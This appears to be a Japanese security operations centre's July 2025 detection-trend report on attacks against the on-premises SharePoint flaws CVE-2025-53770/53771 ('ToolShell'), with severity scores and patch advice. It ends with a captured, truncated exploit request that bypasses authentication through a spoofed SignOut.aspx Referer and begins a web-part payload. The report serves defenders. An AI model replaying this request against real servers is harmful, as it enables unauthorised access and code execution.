2025.08.15

2025年7月度 MBSD-SOCの検知傾向トピックス

監視

Microsoft SharePointの脆弱性（CVE-2025-53770およびCVE-2025-53771）を狙った攻撃

　今月は、オンプレミスのMicrosoft SharePoint Serverの脆弱性（CVE-2025-53770およびCVE-2025-53771）を狙った攻撃を新たに観測しました。本脆弱性は7/19(土)に公開されたもので、攻撃者に悪用された場合、認証を回避して任意のコードを実行されてしまう恐れがあります。

　本脆弱性のCVSS値（脆弱性の深刻度）は、9.8（Critical）および6.5（Medium）と評価されています。該当製品を使用されている場合は、早急にセキュリティ更新プログラムを適用することをお勧めします。

　下図は、本脆弱性を狙った攻撃の検知数推移です。弊社SOCでは7/22(火)に攻撃を初観測しております。

図. Microsoft SharePointの脆弱性を狙った攻撃数推移

　以下は、弊社SOCで検知した攻撃例です。Refererヘッダーに/layouts/SignOut.aspxを指定して認証の回避を試みた通信となっています。なお、同製品の他脆弱性「CVE-2025-49704」「CVE-2025-49706」と併せた攻撃は「ToolShell」と呼ばれており、ログインなしでSharePointに侵入されて制御されてしまうことが報告されています。

図. Microsoft SharePointの脆弱性を狙った攻撃例
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1 Host: www.example.co.jp Content-Length: 9341 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Content-Type: application/x-www-form-urlencoded Referer: /_layouts/SignOut.aspx Accept-Encoding: gzip MSOTlPn_Uri=http://www.itsc.org/_controltemplates/15/AclEditor.ascx&MSOTlPn_DWP= <%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %> <asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">